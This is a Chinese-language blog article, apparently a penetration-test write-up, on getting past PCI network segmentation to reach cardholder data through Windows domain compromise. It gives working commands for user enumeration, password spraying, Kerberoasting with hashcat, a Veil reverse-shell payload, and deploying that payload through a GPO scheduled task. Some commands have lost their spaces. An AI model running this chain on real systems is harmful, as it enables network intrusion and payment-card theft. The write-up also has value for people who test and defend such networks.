如何使用Windows域繞過防火墻獲取持卡人數(shù)據(jù)的訪問權(quán)限

這篇文章將為大家詳細(xì)講解有關(guān)如何使用Windows域繞過防火墻獲取持卡人數(shù)據(jù)的訪問權(quán)限，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個(gè)參考，希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解。

我們將介紹如何繞過防火墻系統(tǒng)，并獲取到持卡人數(shù)據(jù)環(huán)境(CDE)的訪問權(quán)。最終目標(biāo)：提取目標(biāo)用戶的信用卡數(shù)據(jù)。

如果你需要在你的網(wǎng)絡(luò)中存儲、傳輸或處理信用卡數(shù)據(jù)的話，那么信用卡數(shù)據(jù)安全就必須要得到有效保障。根據(jù)PCI數(shù)據(jù)安全標(biāo)準(zhǔn)（PCI-DSS），持卡人數(shù)據(jù)可以直接在內(nèi)部網(wǎng)絡(luò)中傳輸和發(fā)送，前提是網(wǎng)絡(luò)系統(tǒng)已實(shí)施了網(wǎng)絡(luò)分割，而這種網(wǎng)絡(luò)范圍（劃分持卡人數(shù)據(jù)環(huán)境跟其他網(wǎng)絡(luò)）的定義一般都是通過防火墻來實(shí)現(xiàn)的。

為了保護(hù)客戶的機(jī)密數(shù)據(jù)，我們需要對網(wǎng)絡(luò)的實(shí)現(xiàn)細(xì)節(jié)進(jìn)行修改。假設(shè)公司擁有一個(gè)非常大型的網(wǎng)絡(luò)系統(tǒng)，全部的地址都在10.0.0.0/8這個(gè)范圍內(nèi)。持卡人數(shù)據(jù)則需要單獨(dú)劃分至192.168.0.0/16這個(gè)范圍，并通過防火墻進(jìn)行隔離。

注：CDE一般由呼叫中心（負(fù)責(zé)處理電話訂單）和操作人員（負(fù)責(zé)將支付信息填寫進(jìn)Web表但）組成。

此次測試只是一次內(nèi)部測試，因此我們直接連接至公司的內(nèi)部辦公網(wǎng)絡(luò)（10.0.0.0/8地址范圍）。從這個(gè)地址利用ping命令和端口掃描功能來掃描CDE環(huán)境：

Ping掃描基本上相當(dāng)于直接運(yùn)行ping命令，但nmap可以“一鍵式”掃描整個(gè)IP段。“hosts up”是第二個(gè)命令的輸出，因?yàn)槲覀兲砑恿恕?Pn”參數(shù)來判斷是否是第一次ping，因此nmap將會報(bào)告當(dāng)前范圍內(nèi)所有“up”的主機(jī)。

因此，除非部署了防火墻規(guī)則來繞過漏洞，或防火墻使用了弱密碼，否則這種方式的效果是不會理想的。因此，我們第一不要做的就是如何通過獲取域管理員權(quán)限來控制活動目錄。

如何變成域管理員？

在我們的場景中，我們選擇使用kerberoast來控制域。入侵活動目錄的第一步，通常需要獲取任意用戶賬號的訪問權(quán)，只要我們能夠通過域控制器的認(rèn)證就可以了。在Windows中，所有的賬號都能通過域控制器的認(rèn)證，即使它們沒有權(quán)限來做實(shí)際的事情。也就是說，最低權(quán)限的賬戶，只要登錄完成之后并輸入正確的密碼，它就可以通過驗(yàn)證。

在這名用戶的站點(diǎn)上，沒有在域控制器中啟用會話。因此，我們的域控制器為10.0.12.100,“PETER”。我們可以使用enum4linux之類的功能根據(jù)來枚舉出用戶列表，并獲取到域中每一位用戶的用戶名：

$ enum4linux -R 1000-50000 10.0.12.100|tee enum4linux.txt

拿到用戶列表之后，我們就可以對其進(jìn)行解析處理了：

$ cat enum4linux.txt | grep '(LocalUser)' |awk '$2 ~ /MACFARLANE\\/ {print $2}'| grep -vP '^.*?\$$' | sed's/MACFARLANE\\//g'

這個(gè)網(wǎng)絡(luò)非常龐大，有超過25000個(gè)活動用戶，不過我使用grep進(jìn)行了簡單的用戶篩選，足以演示我們的攻擊操作了。

現(xiàn)在，拿到包含用戶列表的文本文件后，我們就可以使用CrackMapExec之類的工具來猜測用戶密碼了。這里我們猜測目標(biāo)賬號的密碼是否為“Password1”：

$ cme smb 10.0.12.100 -u users.txt -pPassword1

如果我們想要繼續(xù)猜解，則需要指定“--continue-on-success”參數(shù)：

拿到這個(gè)用戶賬號之后，我們就可以查詢活動目錄，并獲取服務(wù)賬號列表了。服務(wù)賬號就是針對服務(wù)運(yùn)行的用戶賬號，比如說Microsoft SQL Server等等，它們需要在特定用戶賬號環(huán)境中運(yùn)行?；顒幽夸浀腒erberos認(rèn)證系統(tǒng)可以用來提供訪問權(quán)限，因此活動目錄會提供一個(gè)“服務(wù)令牌”來運(yùn)行用戶進(jìn)行認(rèn)證。

通過從域控制器請求Kerberos服務(wù)賬號列表，我們還可以得到每一個(gè)賬號的“服務(wù)令牌”。這個(gè)服務(wù)令牌使用了服務(wù)賬號的密碼進(jìn)行加密。所以，如果我們破解密碼，我們就可以使用這個(gè)賬號，而這種賬號一般都是高權(quán)限賬號：

我們可以看到，其中一個(gè)賬號為域管理組成員，所以我們可以直接破解它：

$ hashcat -m 13100 --potfile-disableSPNs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

Hashcat運(yùn)行之后，我們就拿到了明文密碼：

這是一個(gè)活動賬號，我們可以再次使用CrackMapExec：

$ cme smb 10.0.12.100 -u redrum -p'murder1!'

非常好，我們拿到了域控制器的管理員賬號！

現(xiàn)在，雖然我們不能直接訪問目標(biāo)設(shè)備，但我們可以通過活動目錄域來讓域控制器幫助我們跟目標(biāo)設(shè)備進(jìn)行交互。我們的目標(biāo)是在CDE中通過呼叫中心控制同一活動目錄中的其他計(jì)算機(jī)。為此，我們還需要深入了解組策略對象（GPO）。

GPO允許將各種范圍級別的設(shè)置應(yīng)用于用戶和計(jì)算機(jī)，它可以以不同范圍級別控制域中的計(jì)算機(jī)?？蛻鬐PO的許多功能都適用于統(tǒng)一管理組織中的IT設(shè)置。例如，統(tǒng)一設(shè)置密碼策略，或者統(tǒng)一設(shè)置為用戶桌面顯示哪些圖標(biāo)（例如，打開公司網(wǎng)站的快捷方式）。而有一個(gè)GPO可以運(yùn)行微軟中的“計(jì)劃任務(wù)”，這正是我們所需要的。

這里我創(chuàng)建了一個(gè)需要在目標(biāo)機(jī)器中運(yùn)行的腳本，讓它們連接回我們的機(jī)器。以下是具體步驟：

1.生成payload。這里我們使用了Veil Evasion。我們的IP地址是10.0.12.1，因此我們設(shè)置回連到這個(gè)地址：

$ veil -t EVASION -p 22 --ip 10.0.12.1--port 8755 -o pci_shell

2.使用我們從kerberoasting獲得的憑據(jù)，通過遠(yuǎn)程桌面協(xié)議（RDP）登錄到域控制器。

3.在活動目錄中找到CDE。根據(jù)我們對目標(biāo)的了解，他們的呼叫中心在2樓工作。通過瀏覽目錄，我們定位到一個(gè)特殊的名字：

4.將我們用Veil制作的惡意腳本放入文件夾，然后在域控制器上進(jìn)行共享。在共享和目錄上設(shè)置權(quán)限，允許所有域用戶讀?。?/p>

5.創(chuàng)建GPO策略：

6.在編輯這個(gè)新的GPO時(shí)，點(diǎn)擊“計(jì)劃任務(wù)”，并創(chuàng)建新的“即時(shí)計(jì)劃任務(wù)”：

7.創(chuàng)建指向共享惡意腳本的任務(wù)。同時(shí)在common下設(shè)置”Run in logged-on user's securitycontext”：

等待片刻后，情況如下所示：

沒錯(cuò)，就是我們要的支付卡數(shù)據(jù)：

滲透工作目前已全部完成！

關(guān)于如何使用Windows域繞過防火墻獲取持卡人數(shù)據(jù)的訪問權(quán)限就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，可以學(xué)到更多知識。如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到。